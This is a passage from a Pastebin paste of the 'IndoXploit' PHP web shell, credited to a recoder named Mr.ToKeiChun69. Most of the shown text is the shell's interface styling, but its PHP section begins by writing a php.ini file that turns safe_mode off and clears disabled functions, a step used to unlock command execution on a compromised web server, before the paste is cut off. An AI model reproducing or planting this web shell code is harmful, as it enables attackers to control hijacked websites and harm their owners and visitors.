  1727. <meta name='author' content='IndoXploit Recoded By Mr.ToKeiChun69'>
  1728. <meta charset="UTF-8">
  1729. <style type='text/css'>
  1730. @import url(https://fonts.googleapis.com/css?family=Abel);
  1731. html {
  1732. background: #000000;
  1733. color: #ffffff;
  1734. font-family: 'Abel';
  1735. font-size: 13px;
  1736. width: 100%;
  1737. }
  1738. li {
  1739. display: inline;
  1740. margin: 5px;
  1741. padding: 5px;
  1742. }
  1743. table, th, td {
  1744. border-collapse:collapse;
  1745. font-family: Tahoma, Geneva, sans-serif;
  1746. background: transparent;
  1747. font-family: 'Abel';
  1748. font-size: 13px;
  1749. }
  1750. .table_home, .th_home, .td_home {
  1751. border: 1px solid #ffffff;
  1752. }
  1753. th {
  1754. padding: 10px;
  1755. }
  1756. a {
  1757. color: #ffffff;
  1758. text-decoration: none;
  1759. }
  1760. a:hover {
  1761. color: gold;
  1762. text-decoration: underline;
  1763. }
  1764. b {
  1765. color: gold;
  1766. }
  1767. input[type=text], input[type=password],input[type=submit] {
  1768. background: transparent;
  1769. color: #ffffff;
  1770. border: 1px solid #ffffff;
  1771. margin: 5px auto;
  1772. padding-left: 5px;
  1773. font-family: 'Abel';
  1774. font-size: 13px;
  1775. }
  1776. textarea {
  1777. border: 1px solid #ffffff;
  1778. width: 100%;
  1779. height: 400px;
  1780. padding-left: 5px;
  1781. margin: 10px auto;
  1782. resize: none;
  1783. background: transparent;
  1784. color: #ffffff;
  1785. font-family: 'Abel';
  1786. font-size: 13px;
  1787. }
  1788. select {
  1789. background: transparent;
  1790. color: #ffffff;
  1791. border: 1px solid #ffffff;
  1792. margin: 5px auto;
  1793. padding-left: 5px;
  1794. font-family: 'Abel';
  1795. font-size: 13px;
  1796. }
  1797. .but {
  1798. background: transparent;
  1799. color: #ffffff;
  1800. border: 1px solid #ffffff;
  1801. margin: 5px auto;
  1802. padding-left: 5px;
  1803. font-family: 'Abel';
  1804. font-size: 13px;
  1805. }
  1806. </style>
  1807. </head>
  1808. <?php
  1809. if (file_exists("php.ini")){
  1810. }else{
  1811. $img = fopen('php.ini', 'w');
  1812. $sec = "safe_mode = OFF
  1813. disable_funtions = NONE";
  1814. fwrite($img ,$sec);
  1815. fclose
  1816. ----- Message truncated -----
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!